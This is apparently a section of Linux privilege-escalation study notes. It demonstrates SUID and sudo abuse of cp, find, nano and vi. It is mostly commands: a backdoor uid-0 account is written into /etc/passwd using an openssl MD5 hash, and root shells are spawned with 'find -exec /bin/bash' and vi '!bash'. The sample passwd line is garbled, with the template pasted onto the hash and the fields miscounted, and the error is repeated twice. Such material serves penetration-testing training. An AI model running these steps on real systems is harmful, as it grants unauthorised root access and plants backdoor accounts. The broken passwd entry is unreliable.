5.2.2 SUID Exploitation
SUID Exploitation
r=read, w=write, x=execute
rwx rwx rwx
user group others
421 421 421
4+2+1=7 4+2+1=7 4+2+1=7
chmod 777 #Maximum privileges
#Special Permissions
SUID (user) -> rwx -> rwS
SGID (group) -> rwx -> rwS
Sticky bits (others) -> rwT
chmod u+s = chmod 4755
find / -perm -u=s -type f 2>/dev/null #find files with root owner
Suid Exploits (PoC)
CP Command
adduser new_user #create a new user
getent passwd new_user #check if new_user exists
su new_user #switch to new_user account
cp /etc/passwd /var/www/html/ #PERMISSION DENIED!
Infact, if I try to use: find / -perm -u=s -type f 2>/dev/null
there's not cp path (or in alternative see permissions of ls -al command_path_name
). If we want to assign SUID permission at cp command, we need to use chmod u+s (path of cp command):
which cp
/usr/bin/cp
chmod u+s /usr/bin/cp #it needs root permissions
Now, every users can execute cp command with root permissions!
Then, we can execute the same sequence of commands regarding cp of /etc/passwd using new_user account user:
su new_user
cp /etc/passwd /var/www/html/
The idea is to add a new user with root permissions and not only for cp command.
Using openssl passwd
we generate a password with MD5 algorithm (option -1) and custom salt
openssl passwd -1 -salt new_root_user new_password
$1$new_root$qigEVpHXRPIfTT6fXhm7H0 #hash
Then, construct our costum account string to append in /etc/passwd file based on this format:
<username>:<hash>:0:0:0:root:/root:/bin/bash
new_root_user:$1$new_root$qigEVpHXRPIfTT6fXhm7H0<username>:<hash>:0:0:0:root:/root:/bin/bash
Add it in our local copy of /etc/passw using vim or nano or copy it in original file:
nano /etc/passwd
#paste it and save: new_root_user:$1$new_root$qigEVpHXRPIfTT6fXhm7H0<username>:<hash>:0:0:0:root:/root:/bin/bash
Finally we can log into new_root_user and have root privileges.
GTFOBins
In alternative we can do privilege escalation using commands present on GTFOBins site regarding cp
command in the section of SUID:
FIND Command
In the wake of the previous example, we proceed with the find command, using the same normal user (new_user).
which find
/usr/bin/find
ls -al /usr/bin/find
-rwxr-xr-x 1 root root 224848 8 gen 2023 /usr/bin/find
chmod u+s /usr/bin/find #give SUID permissions, it needs root permissions
To do privilege escalation we only need to file an existing file using find command:
find example_file -exec "whoami" \;
root
GTFOBins
in alternative we can do privilege escalation using commands present on GTFOBins site regarding find
command in the section of SUID:
NANO Command
As the last case, we do this sequence of command to do NANO SUID exploitation:
which nano
/usr/bin/nano
ls -al /usr/bin/nano
-rwxr-xr-x 1 root root 287480 18 gen 2023 /usr/bin/nano
chmod u+s /usr/bin/nano #give SUID permissions, it needs root permissions
Now, we can open file with root permissions like as /etc/passwd with a normal user using nano:
nano /etc/passwd
As the example of Copy SUID, the idea is to add a new user with root permissions and not only for nano command.
Using openssl passwd
we generate a password with MD5 algorithm (option -1) and custom salt
openssl passwd -1 -salt new_root_user new_password
$1$new_root$qigEVpHXRPIfTT6fXhm7H0 #hash
Then, construct our costum account string to append in /etc/passwd file based on this format:
<username>:<hash>:0:0:0:root:/root:/bin/bash
new_root_user:$1$new_root$qigEVpHXRPIfTT6fXhm7H0<username>:<hash>:0:0:0:root:/root:/bin/bash
Add it in our local copy of /etc/passw using vim or nano or copy it in original file:
nano /etc/passwd
#paste it and save: new_root_user:$1$new_root$qigEVpHXRPIfTT6fXhm7H0<username>:<hash>:0:0:0:root:/root:/bin/bash
Finally we can log into new_root_user and have root privileges.
GTFOBins
in alternative we can do privilege escalation using commands present on GTFOBins site regarding nano
command in the section of SUID:
RIGHT Command
Sudoers file can cantoins users with a specific root permission called SUDO Rights, e.g. new_user ca execute find
command as root:
visudo #to open sudoers file
root ALL=(ALL:ALL) ALL
new_user ALL=(root) NOPASSWD: /usr/bin/find
To do privilege escalation we only need to file an existing file using find command:
su new_user
sudo find /home -exec /bin/bash \;
root
Can we do the same for others command, e.g. vi command:
new_user ALL=(root) NOPASSWD: /usr/bin/vi
su new_user
sudo vi example_file
!bash #write it into example_file and save using Enter
root
It's possible to do the same for more command such as: man, python, nano, vim, etc.